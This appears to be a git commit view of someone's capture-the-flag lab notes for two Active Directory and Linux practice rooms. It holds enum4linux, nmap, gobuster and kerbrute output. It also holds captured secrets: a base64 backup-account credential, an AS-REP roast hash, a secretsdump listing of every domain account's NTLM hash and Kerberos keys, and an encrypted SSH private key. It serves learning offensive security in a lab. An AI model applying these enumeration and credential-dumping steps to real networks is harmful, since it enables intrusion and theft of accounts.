[+] Server 10.10.241.222 allows sessions using username '', password ''

 ================================( Getting domain SID for 10.10.241.222 )================================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963

[+] Host is part of a domain (not a workgroup)

 ==================================( OS information on 10.10.241.222 )==================================

[E] Can't get OS info with smbclient

[+] Got OS info for 10.10.241.222 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
 =======================================( Users on 10.10.241.222 )=======================================

[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED


[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 =================================( Share Enumeration on 10.10.241.222 )=================================
do_connect: Connection to 10.10.241.222 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.241.222

 ===========================( Password Policy Information for 10.10.241.222 )===========================

[E] Unexpected error from polenum:

[+] Attaching to 10.10.241.222 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.241.222)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.

[E] Failed to get password policy with rpcclient

 ======================================( Groups on 10.10.241.222 )======================================

[+] Getting builtin groups:

[+]  Getting builtin group memberships:

[+]  Getting local groups:

[+]  Getting local group memberships:

[+]  Getting domain groups:

[+]  Getting domain group memberships:

 ==================( Users on 10.10.241.222 via RID cycling (RIDS: 500-550,1000-1050) )==================

[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963

[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963

[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)

[+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
 ===============================( Getting printer info for 10.10.241.222 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed Oct 15 16:56:19 2025

19
CTF/AttacktiveDirectory/kerbrute_userenum.txt Normal file
View File

@@ -0,0 +1,19 @@
2025/10/15 17:08:13 > Using KDC(s):
2025/10/15 17:08:13 > 10.10.241.222:88
2025/10/15 17:08:14 > [+] VALID USERNAME: james@spookysec.local
2025/10/15 17:08:16 > [+] VALID USERNAME: svc-admin@spookysec.local
2025/10/15 17:08:19 > [+] VALID USERNAME: James@spookysec.local
2025/10/15 17:08:19 > [+] VALID USERNAME: robin@spookysec.local
2025/10/15 17:08:30 > [+] VALID USERNAME: darkstar@spookysec.local
2025/10/15 17:08:38 > [+] VALID USERNAME: administrator@spookysec.local
2025/10/15 17:08:58 > [+] VALID USERNAME: backup@spookysec.local
2025/10/15 17:09:10 > [+] VALID USERNAME: paradox@spookysec.local
2025/10/15 17:10:06 > [+] VALID USERNAME: JAMES@spookysec.local
2025/10/15 17:10:20 > [+] VALID USERNAME: Robin@spookysec.local
2025/10/15 17:11:32 > [+] VALID USERNAME: Administrator@spookysec.local
2025/10/15 17:13:37 > [+] VALID USERNAME: Darkstar@spookysec.local
2025/10/15 17:14:13 > [+] VALID USERNAME: Paradox@spookysec.local
2025/10/15 17:16:28 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2025/10/15 17:17:03 > [+] VALID USERNAME: ori@spookysec.local
2025/10/15 17:18:07 > [+] VALID USERNAME: ROBIN@spookysec.local
2025/10/15 18:13:51 > Done! Tested 73317 usernames (16 valid) in 908.038 seconds

4
CTF/AttacktiveDirectory/nmap_scan1.gnmap Normal file
View File

@@ -0,0 +1,4 @@
# Nmap 7.95 scan initiated Wed Oct 15 16:46:53 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oG nmap_scan1.gnmap 10.10.241.222
Host: 10.10.241.222 () Status: Up
Host: 10.10.241.222 () Ports: 53/open/tcp//domain//Simple DNS Plus/, 80/open/tcp//http//Microsoft IIS httpd 10.0/, 88/open/tcp//kerberos-sec//Microsoft Windows Kerberos (server time: 2025-10-15 14:47:05Z)/, 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 389/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)/, 445/open/tcp//microsoft-ds?///, 464/open/tcp//kpasswd5?///, 593/open/tcp//ncacn_http//Microsoft Windows RPC over HTTP 1.0/, 636/open/tcp//tcpwrapped///, 3268/open/tcp//ldap//Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)/, 3269/open/tcp//tcpwrapped///, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/, 5985/open/tcp//http//Microsoft HTTPAPI httpd 2.0 (SSDP|UPnP)/ Ignored State: closed (986) Seq Index: 261 IP ID Seq: Incremental
# Nmap done at Wed Oct 15 16:47:32 2025 -- 1 IP address (1 host up) scanned in 39.39 seconds

70188
CTF/AttacktiveDirectory/passwordlist.txt Normal file
View File

File diff suppressed because it is too large Load Diff

1
CTF/AttacktiveDirectory/smbshare_backup/backup_credentials.txt Executable file
View File

@@ -0,0 +1 @@
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

1
CTF/AttacktiveDirectory/svc-admin_hash.txt Normal file
View File

@@ -0,0 +1 @@
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:e8176354e982957381e03bc53754d362$3f246cdacd0203fab05c9aba71a5bd3a43fe80536702824aa6738baecd380039a70427d3e87aaed95f7a2a3b5f0c4138632fbc3fb5e379a1e6f635383588102c626d5decaaa11718c7798b4b0af686bab3a98af958794e0512ebe92f33603a6e13a4c08f7efa6c4805792f77923bf020247a0b98583126f8b95ce7aa70f69a13382ba5bde4ccc494ef29533ce98a703155cf163710fa1949611b4e8678ad22a84092791290169b2596fa5d828dedd28f402e223eefa0c8151fd9d28ae5d3d19b5afeee716f4ec5c132f7659636576feb35c80108dbbf084bf8acfb8a854ef100b01259a0a2f43b88f08c4cad17e75463c413

16
CTF/AttacktiveDirectory/test_usernames.txt Normal file
View File

@@ -0,0 +1,16 @@
james@spookysec.local
svc-admin@spookysec.local
James@spookysec.local
robin@spookysec.local
darkstar@spookysec.local
administrator@spookysec.local
backup@spookysec.local
paradox@spookysec.local
JAMES@spookysec.local
Robin@spookysec.local
Administrator@spookysec.local
Darkstar@spookysec.local
Paradox@spookysec.local
DARKSTAR@spookysec.local
ori@spookysec.local
ROBIN@spookysec.local

76
CTF/AttacktiveDirectory/user_hashes.txt Normal file
View File

@@ -0,0 +1,76 @@
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:ca09477729bf474d2cb1dfdd00306825:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:701e5759c859973211bb4ba1567c031431e43c8e4ef49677c305bccab225c1de
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:045d7818869ce52a555b7dac67c3a0a4
ATTACKTIVEDIREC$:des-cbc-md5:3de0347cb33e835b
[*] Cleaning up...

73317
CTF/AttacktiveDirectory/userlist.txt Normal file
View File

File diff suppressed because it is too large Load Diff

191
CTF/BasicPentesting/enum4linux_scan1.txt Normal file
View File

@@ -0,0 +1,191 @@
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Oct 15 20:57:13 2025
 =========================================( Target Information )=========================================
Target ........... 10.10.208.221
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 ===========================( Enumerating Workgroup/Domain on 10.10.208.221 )===========================

[+] Got domain/workgroup name: WORKGROUP

 ===============================( Nbtstat Information for 10.10.208.221 )===============================
Looking up status of 10.10.208.221
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
 ===================================( Session Check on 10.10.208.221 )===================================

[+] Server 10.10.208.221 allows sessions using username '', password ''

 ================================( Getting domain SID for 10.10.208.221 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

 ==================================( OS information on 10.10.208.221 )==================================

[E] Can't get OS info with smbclient

[+] Got OS info for 10.10.208.221 from srvinfo:
 BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.15.13-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
 =======================================( Users on 10.10.208.221 )=======================================

 =================================( Share Enumeration on 10.10.208.221 )=================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.15.13-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 10.10.208.221 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.208.221
//10.10.208.221/Anonymous Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.208.221/IPC$ Mapping: N/A Listing: N/A Writing: N/A
 ===========================( Password Policy Information for 10.10.208.221 )===========================

[+] Attaching to 10.10.208.221 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 136 years 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
 ======================================( Groups on 10.10.208.221 )======================================

[+] Getting builtin groups:

[+]  Getting builtin group memberships:

[+]  Getting local groups:

[+]  Getting local group memberships:

[+]  Getting domain groups:

[+]  Getting domain group memberships:

 ==================( Users on 10.10.208.221 via RID cycling (RIDS: 500-550,1000-1050) )==================

[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)
 ===============================( Getting printer info for 10.10.208.221 )===============================
No printers returned.
enum4linux complete on Wed Oct 15 21:03:45 2025

20
CTF/BasicPentesting/gobuster_scan1.txt Normal file
View File

@@ -0,0 +1,20 @@
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.208.221:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/manager (Status: 302) [Size: 0] [--> /manager/]
===============================================================
Finished
===============================================================

22
CTF/BasicPentesting/gobuster_scan2.txt Normal file
View File

@@ -0,0 +1,22 @@
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.208.221:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico (Status: 200) [Size: 21630]
/host-manager (Status: 302) [Size: 0] [--> /host-manager/]
/manager (Status: 302) [Size: 0] [--> /manager/]
===============================================================
Finished
===============================================================

19
CTF/BasicPentesting/gobuster_scan3.txt Normal file
View File

@@ -0,0 +1,19 @@
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.208.221/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 320] [--> http://10.10.208.221/development/]
/server-status (Status: 403) [Size: 278]
===============================================================
Finished
===============================================================

21
CTF/BasicPentesting/gobuster_scan4.txt Normal file
View File

@@ -0,0 +1,21 @@
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.208.221:8080
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico (Status: 200) [Size: 21630]
/manager (Status: 302) [Size: 0] [--> /manager/]
===============================================================
Finished
===============================================================

55
CTF/BasicPentesting/id_rsa Normal file
View File

@@ -0,0 +1,55 @@
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
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
